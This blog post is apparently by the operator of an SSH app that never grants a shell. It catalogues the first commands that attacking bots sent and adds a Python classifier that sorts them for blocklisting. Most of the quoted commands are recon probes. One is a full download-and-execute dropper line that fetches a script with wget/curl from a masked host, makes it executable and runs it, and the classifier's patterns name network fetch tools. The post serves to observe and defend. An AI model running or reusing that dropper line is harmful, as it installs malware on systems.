As I wrote in the previous post, I now have an SSH app that has been running for a month. The good thing is that I have lots of visitors. The bad thing is that, unfortunately, none of them is an actual user 🥲
My SSH app is under attack.
It's no problem. The app talks the SSH protocol over the network, but it never gives attackers an actual shell. (The app runs in a distroless container image, which keeps its exposure to known vulnerabilities to a minimum.)
Messages I Got
So what do the attacks look like? Let me share some of the hello messages I received.
echo IoT_ACCESS_VERIFIED
This is the message I've received the most. What does this even mean? Well, it just prints IoT_ACCESS_VERIFIED literally, and only when the login succeeded. As you may realize, this is probably sent by bots: when the attempt succeeds, the bot tells its owner it has found a new target. Is this a de facto standard echo command in the bot community? Or there might be a well-known program written for this purpose in Go.
The list has many messages that serve a similar purpose:
whoami
true
pwd
hostname
Let's see what other messages look like:
uname -s -m
uname -a
I have never used uname personally. The command identifies the OS and CPU architecture as well as their versions. I guess it is used to find vulnerable servers with obsolete OS versions on the internet. It's a bit scary thinking about a website that has been unmaintained for years...
mount | head - 5
This lists the devices currently mounted on the server you're in. Why this command? No idea.
netstat -tulpn 2>/dev/null | grep LISTEN | head -20
This one-liner above will display the first 20 ports the server is listening on. Cool.
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm sMLuxc.sh;wget http://<server_name>/sMLuxc.sh || curl -O http://<server_name>/sMLuxc.sh || /bin/busybox wget http://<server_name>/sMLuxc.sh; chmod 777 sMLuxc.sh;./sMLuxc.sh
This one is the most aggressive one I have ever received. It downloads a malicious script and runs it. Interesting... (I masked the IP address of the site so that no one accidentally visits it.)
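Since the app never executes any of these commands, the only thing worth doing with them is classifying them for your own logs. As an added example (not part of the original post, and not the app's own code), here is a small Python classifier that sorts captured first-command lines like the ones above into a few categories and pulls out any staging URLs for blocklisting. The category names, the regular expressions and the segment counting are my own assumptions; the sample lines are the ones quoted in the post, with the dropper's host already masked.

```python
"""Classify command lines captured by a shell-less SSH listener.

Added example, not code from the original post. Category names and
patterns are assumptions chosen for illustration.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Sample input constructed from the lines quoted in the post.
CAPTURED = [
    "echo IoT_ACCESS_VERIFIED",
    "whoami",
    "true",
    "pwd",
    "hostname",
    "uname -s -m",
    "uname -a",
    "mount | head - 5",
    "netstat -tulpn 2>/dev/null | grep LISTEN | head -20",
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm sMLuxc.sh;"
    "wget http://<server_name>/sMLuxc.sh || curl -O http://<server_name>/sMLuxc.sh || "
    "/bin/busybox wget http://<server_name>/sMLuxc.sh; chmod 777 sMLuxc.sh;./sMLuxc.sh",
]

# Anything that fetches a file over the network (busybox applets included).
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b", re.IGNORECASE)
# Anything that makes a file executable or runs one.
EXEC_RE = re.compile(r"chmod\s+(?:\+x|[0-7]{3,4})|\./\S+|\b(?:sh|bash)\s+\S+")
# URLs embedded in the command; stop at whitespace and shell separators.
URL_RE = re.compile(r"https?://[^\s;|&'\"]+")
# Shell separators used to chain commands: ||, &&, ;, and a single pipe.
SEPARATOR_RE = re.compile(r"\s*(?:\|\||&&|;|\|)\s*")

# Lower-severity rules, checked in order after the fetch/execute check.
RULES = [
    # A bare "echo TOKEN" is the bot reporting a successful login to its owner.
    ("success-marker", re.compile(r"^\s*echo\s+\S+\s*$")),
    # Host and network fingerprinting commands.
    ("recon", re.compile(r"^\s*(?:uname|whoami|hostname|pwd|mount|netstat|ss|id)\b")),
    # "true" only checks that command execution works at all.
    ("liveness-probe", re.compile(r"^\s*true\s*$")),
]


@dataclass
class Verdict:
    category: str
    urls: list      # unique staging URLs found in the line, in order
    segments: int   # number of chained shell commands


def segment_count(line: str) -> int:
    """Count the individual commands chained together on one line."""
    return len([s for s in SEPARATOR_RE.split(line) if s.strip()])


def classify(line: str) -> Verdict:
    """Assign one category per captured line; most severe wins."""
    urls = list(dict.fromkeys(URL_RE.findall(line)))  # dedupe, keep order
    fetch = FETCH_RE.search(line) is not None
    execute = EXEC_RE.search(line) is not None
    if fetch and execute:
        category = "download-and-execute"
    elif fetch:
        category = "download"
    else:
        category = "unknown"
        for name, pattern in RULES:
            if pattern.search(line):
                category = name
                break
    return Verdict(category, urls, segment_count(line))


def summarize(lines) -> Counter:
    """Count how many captured lines fall into each category."""
    return Counter(classify(line).category for line in lines)


if __name__ == "__main__":
    for line in CAPTURED:
        v = classify(line)
        print(f"{v.category:22} segments={v.segments:2} urls={v.urls}  {line[:60]}")
    print(summarize(CAPTURED))
```

The fetch-and-execute check runs before the simpler rules so that a line such as `echo X; wget ...` is not mistaken for a harmless success marker, and the segment count gives a cheap second signal: a first command with ten or more chained segments is almost never typed by a human.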
One More Thing
They come to my app from all over the world, at least. So I send the following code back to my visitors as a welcome message 😊
aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kRlVsQVFaQjlOZwo=
It should be too easy for them. But I hope they like it 😉